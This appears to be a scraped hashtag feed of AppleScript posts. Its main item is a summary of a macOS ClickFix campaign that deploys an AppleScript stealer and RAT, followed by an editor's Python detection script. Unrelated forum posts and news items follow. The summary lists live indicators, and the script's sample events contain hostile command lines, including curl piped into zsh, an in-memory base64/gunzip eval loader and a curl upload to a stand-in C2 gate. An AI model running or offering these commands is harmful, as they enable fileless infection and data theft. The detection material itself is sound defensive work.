📢 macOS ClickFix: a persistent RAT and an AppleScript stealer target Asia, North America and Oceania
📝 ## 🔍 Context

Netskope Threat Labs published on 17 June 2026 a...
📖 cyberveille : https://cyberveille.ch/posts/2026-06-19-macos-clickfix-un-rat-persistant-et-un-stealer-applescript-ciblent-asie-amerique-du-nord-et-oceanie/
🌐 source : https://www.netskope.com/blog/macos-clickfix-lures-deploy-applescript-stealer-persistent-rat
#AppleScript #AppleScript_RAT #Cyberveille

macOS ClickFix: a persistent RAT and an AppleScript stealer target Asia, North America and Oceania

🔍 Context
Netskope Threat Labs published on 17 June 2026 a technical analysis of a ClickFix campaign targeting macOS, intercepted on 31 May 2026. The campaign follows a first wave reported in April 2026 and is a significant evolution: it now deploys a persistent RAT (Remote Access Trojan) alongside an AppleScript infostealer. The attacker is identified as Russian-speaking.

🎯 Targeting and distribution
- Victims: mainly in Asia, North America and Oceania
- Sectors: technology, media, business services
- Infrastructure: 25 short-lived lure domains, all proxied through Cloudflare and registered with the same administrator email (dbc9a6801423efc7s@ghastlier[.]com)
- Lure pages: three variants, a fake macOS utility page ("StellarScan Solutions"), a fake GitHub page, and a localised IT-support page (Berlin)

⚙️ Infection chain (fully fileless)
- ClickFix social engineering: the victim is talked into copying and pasting a curl command into Terminal
- Stage 1 (zsh loader): a gzip+base64 script evaluated in memory, which:
  - geofences the CIS: detects a Russian keyboard layout via com.apple.HIToolbox.plist and exits silently
  - sends a telemetry beacon to the C2 (IP, locale, hostname, OS, build hash)
  - fetches the AppleScript payload with curl piped directly into osascript (never written to disk)
- Stage 2 ("Meow DEBUG"): AppleScript payload executed entirely in memory

🦠 Stage 2 payload capabilities
- Credential theft: fake System Preferences dialog, password checked with dscl . -authonly, up to 10 attempts
- Browser data: Chrome, Brave, Edge, Opera, Firefox, Safari, Arc, Vivaldi, Orion, Sidekick, Coccoc and others (cookies, Login Data, Safe Storage keys)
- Crypto wallets: 25 desktop wallets (Exodus, Electrum, Atomic, Guarda, Coinomi, Sparrow, Wasabi, Bitcoin Core…) plus more than 100 Chromium extensions including MetaMask
- Sessions: Telegram (tdata/), Discord (4 variants), Steam
- File grab: ~/Desktop, ~/Documents (docx, wallet, key, json, rdp, png…)
- Apple Notes: direct copy of the SQLite database
- Exfiltration: ZIP archive to https://qwqerrqwr2145qw.com/gate with a dedicated API key

💉 Desktop wallet injection
After exfiltration, the malware targets Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, Trezor Suite:

CyberVeille
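The chain summarised above leaves process-level traces that are easy to hunt for: a curl download piped into a shell or osascript, a base64-decoded and gunzipped loader evaluated in memory, repeated dscl . -authonly calls under osascript (the fake password dialog being validated), and a curl upload launched from osascript. The following is an added example written by the editor, not code from cyberveille or Netskope: it runs those rules over constructed process events. The event schema (pid, ppid, name, cmdline), the *.invalid hostnames, the user name and the base64 blob are assumptions made for the sample, not indicators from the write-up.

```python
"""Detection rules for the macOS ClickFix chain, run over constructed process events.

Editor's example, not Netskope's or cyberveille's code. The record layout
(pid, ppid, name, cmdline) mimics a generic EDR/osquery process table and is an
assumption, not any product's real schema.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    name: str      # executable basename
    cmdline: str   # full command line as logged


SHELLS = {"zsh", "bash", "sh"}

# Stage 0/1: a curl download piped straight into a shell or osascript.
PIPE_TO_INTERP = re.compile(r"\bcurl\b[^|]*\|\s*(?:osascript|zsh|bash|sh)\b")
# Stage 1 loader: base64-decoded, gunzipped text handed to eval or a shell.
DECODE_GUNZIP = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*(?:gunzip|gzip\s+-d|zcat)\b")
EVAL_OR_SHELL = re.compile(r"\beval\b|\|\s*(?:zsh|bash|sh)\b")
# Stage 2: password validation with 'dscl . -authonly <user> <password>'.
AUTHONLY = re.compile(r"\bdscl\b\s+\.\s+.*-authonly\b")
# Stage 2: curl uploading a file (the ZIP archive) from under osascript.
UPLOAD = re.compile(r"\bcurl\b.*(?:\s-F\s|\s--form\s|\s--data-binary\s|\s-T\s|\s--upload-file\s)")


def _ancestors(ev, by_pid):
    """Names of ev's ancestors, nearest first; tolerates missing or looping ppids."""
    names, seen, cur = [], set(), by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        names.append(cur.name)
        cur = by_pid.get(cur.ppid)
    return names


def detect_clickfix(events):
    """Return sorted (rule, pid) findings for the indicators listed above."""
    by_pid = {e.pid: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e.ppid].append(e)
    findings = set()
    authonly_hits = Counter()  # osascript pid -> number of -authonly probes

    for e in events:
        if PIPE_TO_INTERP.search(e.cmdline):
            findings.add(("curl_piped_to_interpreter", e.pid))
        if DECODE_GUNZIP.search(e.cmdline) and EVAL_OR_SHELL.search(e.cmdline):
            findings.add(("base64_gzip_in_memory_loader", e.pid))
        anc = _ancestors(e, by_pid)
        if e.name == "dscl" and AUTHONLY.search(e.cmdline) and "osascript" in anc:
            authonly_hits[e.ppid] += 1
        if e.name == "curl" and UPLOAD.search(e.cmdline) and "osascript" in anc:
            findings.add(("osascript_curl_upload", e.pid))

    # Process-tree view of 'curl ... | osascript': the shell running the loader
    # spawns curl and osascript as siblings, so the pipe never appears in a cmdline.
    for ppid, kids in children.items():
        parent = by_pid.get(ppid)
        if parent is None or parent.name not in SHELLS:
            continue
        names = {k.name for k in kids}
        if "curl" in names and "osascript" in names:
            findings.add(("shell_spawned_curl_and_osascript", ppid))

    # Several -authonly probes from one osascript = fake dialog retrying the password.
    for ppid, n in authonly_hits.items():
        if n >= 3:
            findings.add(("osascript_authonly_password_probe", ppid))
    return sorted(findings)


# Constructed sample, not real telemetry: one ClickFix chain plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ProcEvent(101, 100, "zsh", "-zsh"),
    # the pasted one-liner, as an EDR that records shell commands would log it
    ProcEvent(102, 101, "zsh", "zsh -c 'curl -fsSL https://lure.invalid/fix | zsh'"),
    ProcEvent(103, 102, "curl", "curl -fsSL https://lure.invalid/fix"),
    # stage 1: packed loader evaluated in memory (blob is a placeholder, assumption)
    ProcEvent(104, 102, "zsh", "zsh -c 'eval \"$(echo H4sIAAAAAAAA... | base64 -d | gunzip)\"'"),
    ProcEvent(105, 104, "curl", "curl -fsSL https://c2.invalid/payload.scpt"),
    ProcEvent(106, 104, "osascript", "osascript"),
    # stage 2: password dialog validated three times, then the ZIP is exfiltrated
    ProcEvent(107, 106, "dscl", "dscl . -authonly alice hunter2"),
    ProcEvent(108, 106, "dscl", "dscl . -authonly alice hunter22"),
    ProcEvent(109, 106, "dscl", "dscl . -authonly alice correct-horse"),
    ProcEvent(110, 106, "curl", "curl -s -F file=@/tmp/out.zip https://c2.invalid/gate"),
    # benign noise
    ProcEvent(200, 1, "launchd", "/sbin/launchd"),
    ProcEvent(201, 101, "curl", "curl -O https://example.invalid/notes.pdf"),
]

if __name__ == "__main__":
    for rule, pid in detect_clickfix(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid}")
```

The cmdline rules only fire when the sensor records the full shell command (many EDRs do, some only log the child executables); the sibling rule and the dscl counter work from the process tree alone, which is why both views are kept. The -authonly threshold of three is a tuning choice for the sample: legitimate tooling rarely calls dscl . -authonly from osascript at all, so even a single hit under osascript is worth a look.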
AELint - SDEF validation tool

AELint is a command line tool that validates an application’s scripting interface. The tool identifies common problems in scripting interfaces and can test the non-destructive portions of an application’s scripting interface to ensure the implementation conforms to the interface advertised by the application’s SDEF.

Late Night Software Ltd.

https://markalldritt.com/?p=1376

#AppleScript #applescripts

AELint

`aelint` validates and tests a scriptable application’s scripting interface.

Mark Alldritt's Journal

For work, I've been looking for a lightweight CRM that integrates well with Microsoft Outlook. Not finding what I wanted, I ended up going down a rabbit hole of experimenting with AppleScript.

Seven hours later and I've discovered that either Outlook or AppleScript is bizarrely bug-ridden: it returns the properties of some emails as I need, but not the properties of others, in ways that make no sense, and that render the whole exercise moot. #AppleScript #MicrosoftOutlook

Extreme slowdowns for user interaction in Tahoe

I write scripts and push them to other users. Tahoe is a major pain. On some, but not all, Tahoe Macs this happens. Every dialog gets a beach ball. It will last for 15 - 45 seconds, and start over for every user action, like typing a single character or for every selection in a multiple select list. Scripts are signed. No difference if they are notarized or not. It happens on some Macs, but on very similar Macs the same script runs just fine. No problems anywhere when run from Script Debugger/Editor. ...

Late Night Software Ltd.
Myriad Tables Scripts run in SD but not SE

Anybody else seeing this error: “The bundle “SMSTableDialogBuilder” couldn’t be loaded because it is damaged or missing necessary resources.” number -4960 from framework “SMSTableDialogBuilder” I get the error when running the script below (and others) from Script Editor, but not Script Debugger. (Also errors in osascript, which is how I first encountered it). I know this script as is has run in the past in SE (not sure about osascript). → Mac OS: 26.4.1 (25E253) → Script Debugger 8.0....

Late Night Software Ltd.
UpDock - AppleScriptable app on App Store

Hey, Everyone, a few weeks ago I was looking for beta testers for my new app. It’s now on the App Store and the free version is complete. UpDock+ is available as an in-app purchase (the only IAP) and the app has no ads or subscriptions. UpDock builds on the concept of Apple’s dock. Instead of giving you a single dock on one edge of the screen, UpDock lets you create mini-docks on the screen edges Apple’s dock doesn’t use. It’s particularly useful for AppleScript workflows, as you can put apps, ...

Late Night Software Ltd.
SHub Reaper: new macOS stealer impersonating Apple, Google and Microsoft in a single attack chain

🔍 Context
Published on 18 May 2026 by Phil Stokes on the SentinelOne blog, this article presents the technical analysis of a new variant of the SHub macOS stealer, identified by the build tag "Reaper". Earlier research by Moonlock, Jamf and Malwarebytes had already documented SHub Stealer and its associated techniques.

🎯 Infection vector and lures
Reaper uses fake WeChat and Miro installers as its initial lures, hosted on typosquatted domains including mlcrosoft[.]co[.]com (impersonating Microsoft). The infection chain changes its disguise at every stage:

CyberVeille

Punto Informatico: SHub steals data and installs a backdoor on macOS

A variant of the well-known SHub infostealer for macOS uses AppleScript to steal a wide range of data and to install a backdoor that gives remote access.
The post "SHub steals data and installs a backdoor on macOS" appeared first on Punto Informatico.

#AppleScript #first #PuntoInformatico

https://www.punto-informatico.it/shub-ruba-dati-installa-backdoor-macos/

Punto Informatico
A simple "Please wait" message

I’ve seen many complex methods for creating a “Please wait” message that can display while an AppleScript does something that takes a long time while showing no activity on screen. I asked Claude Code to come up with something, and it produced the linked code (after a few failed attempts which it managed to fix when prompted to do so):

Late Night Software Ltd.